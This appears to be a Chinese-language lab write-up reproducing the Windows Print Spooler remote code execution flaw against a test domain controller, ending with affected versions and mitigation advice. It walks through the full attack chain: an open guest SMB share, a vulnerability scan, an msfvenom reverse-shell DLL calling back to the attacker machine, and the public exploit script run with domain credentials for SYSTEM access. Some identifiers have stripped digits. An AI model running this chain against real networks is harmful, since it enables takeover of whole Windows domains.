Windows Print Spooler CVE--1675 漏洞复现

Created: July 7, 5:25 PM

漏洞描述

Windows Print Spooler是Windows的打印机后台处理程序，广泛的应用于各种内网中，攻击者可以通过该漏洞绕过PfcAddPrinterDriver的安全验证，并在打印服务器中安装恶意的驱动程序。若攻击者所控制的用户在域中，则攻击者可以连接到DC中的Spooler服务，并利用该漏洞在DC中安装恶意的驱动程序，完整的控制整个域环境。

利用条件

域环境 域内用户 开启Spooler打印功能

复现环境

域控：Windows server IP：192.168.10.10

攻击机：Kali IP：192.168.10.2

漏洞利用

0X01.添加域控的普通账号。

0X02.由于Kali中impacket版本过低需安装更高版本的impacket网络协议工具包

> sudo pip3 uninstall impacketgit clone [/cube0x0/impacket](/cube0x0/impacket)cd impacketsudo python3 ./setup.py install

0X03.攻击机需开启SMB服务并创建共享目录tmp，以便上传木马至域控中

在Kali中编辑 ”/etc/samba/smb.conf" ，修改以下配置

> [global]workgroup = WORKGROUPlog file = /var/log/samba/log.%mmax log size = 1000security = userserver role = standalone servermap to guest = bad userusershare allow guests = yes[smb]comment = Sambabrowseable = yeswriteable = yespublic = yespath = /tmp/read only = noguest ok = yes

重启SMB服务

> systemctl restart smbd.service

测试Kali上的SMB服务能否访问

0X04.通过impacket中的rpcdump.py扫描目标机是否存在漏洞

> python3 rpcdump.py @192.168.10.10 | grep MS-RPRN

如图所示，工具扫描结果显示服务器经过扫描存在漏洞

0X05.在共享目录tmp下通过msfvenom生成.dll文件木马

> msfvenom -p windows/x64/shell_reverse_tcp lhost=192.168.10.2 lport=9999 -f dll -o reverse.dll

0X06.通过MSF中的"exploit/multi/handler"监听模块，建立监听

0X07.通过使用EXP进行利用

> EXP：[/cube0x0/CVE--1675](/cube0x0/CVE--1675)

> python3 CVE--1675.py vu1n:Passw0rd@192.168.10.10 '\\192.168.10.2\smb\reverse.dll'

0X08.成功反弹shell并获取到域控system权限，利用成功。

0X09.在受害机中可以通过"Process Hacker"查看相关的进程

0X10.利用成功之后spooler服务会自动关闭。

影响范围

> Windows Server R2 (Server Core installation)Windows Server R2Windows Server (Server Core installation)Windows Server Windows Server R2 for x64-based Systems Service Pack 1 (Server Core installation)Windows Server R2 for x64-based Systems Service Pack 1Windows Server for x64-based Systems Service Pack 2 (Server Core installation)Windows Server for x64-based Systems Service Pack 2Windows Server for 32-bit Systems Service Pack 2 (Server Core installation)Windows Server for 32-bit Systems Service Pack 2Windows RT 8.1Windows 8.1 for x64-based systemsWindows 8.1 for 32-bit systemsWindows 7 for x64-based Systems Service Pack 1Windows 7 for 32-bit Systems Service Pack 1Windows Server (Server Core installation)Windows Server Windows 10 Version 1607 for x64-based SystemsWindows 10 Version 1607 for 32-bit SystemsWindows 10 for x64-based SystemsWindows 10 for 32-bit SystemsWindows Server, version 20H2 (Server Core Installation)Windows 10 Version 20H2 for ARM64-based SystemsWindows 10 Version 20H2 for 32-bit SystemsWindows 10 Version 20H2 for x64-based SystemsWindows Server, version (Server Core installation)Windows 10 Version for x64-based SystemsWindows 10 Version for ARM64-based SystemsWindows 10 Version for 32-bit SystemsWindows 10 Version 21H1 for 32-bit SystemsWindows 10 Version 21H1 for ARM64-based SystemsWindows 10 Version 21H1 for x64-based SystemsWindows 10 Version 1909 for ARM64-based SystemsWindows 10 Version 1909 for x64-based SystemsWindows 10 Version 1909 for 32-bit SystemsWindows Server (Server Core installation)Windows Server Windows 10 Version 1809 for ARM64-based SystemsWindows 10 Version 1809 for x64-based SystemsWindows 10 Version 1809 for 32-bit Systems

安全建议

安装微软CVE--1675漏洞补丁

/update-guide/vulnerability/CVE--1675

在服务应用（services.msc）中找到Print Spooler服务，将“启动类型”修改为“禁用”

参考

9.利用msfvenom生成木马

MSFvenom | Offensive Security

cube0x0/CVE--1675

CVE--1675 Windows Spooler Service RCE